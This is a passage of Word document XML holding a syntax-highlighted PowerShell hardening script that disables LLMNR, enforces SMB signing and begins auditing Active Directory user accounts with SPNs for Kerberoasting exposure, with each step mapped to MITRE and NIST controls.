          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>#&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Verify admin execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Write-Error </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[!] Script must be executed with Administrative privileges."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Write-Output </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[*] Executing Automated POA&amp;M Remediation Engine..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># MITRE T1557 (Relay Attacks) | NIST SC-8 / AC-4 | Disable LLMNR</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-Output </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] Step 1: Disabling LLMNR to prevent NTLM Relay vulnerabilities..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$RegistryPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient"</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-not (Test-Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$RegistryPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    New-Item -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$RegistryPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force | Out-Null</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">New-ItemProperty -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$RegistryPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Name </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"EnableMulticast"</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value 0 -PropertyType DWord -Force | Out-Null</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># MITRE T1557 (Relay Attacks) | NIST SC-8 / IA-5 | Enforce Required SMB Signing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-Output </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] Step 2: Enforcing Mandatory SMB Server/Client Signing..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Set-SmbServerConfiguration -RequireSecuritySignature </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$true</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Set-SmbClientConfiguration -RequireSecuritySignature </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$true</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"># MITRE T1558.003 (Kerberoasting) | NIST AC-2 / IA-5 | Kerberoasting Audit </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-Output </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] Step 3: Auditing Domain for high-risk User Accounts holding SPNs..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>try {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Import-Module ActiveDirectory -ErrorAction Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Query </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> standard</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>accounts (excluding computer accounts) that have SPNs assigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$KerberoastTargets</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Get-ADUser -Filter {ServicePrincipalName -like </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"*"</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">} -Properties ServicePrincipalName | </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                         Where-Object {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.ObjectClass -eq </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"user"</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -and </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
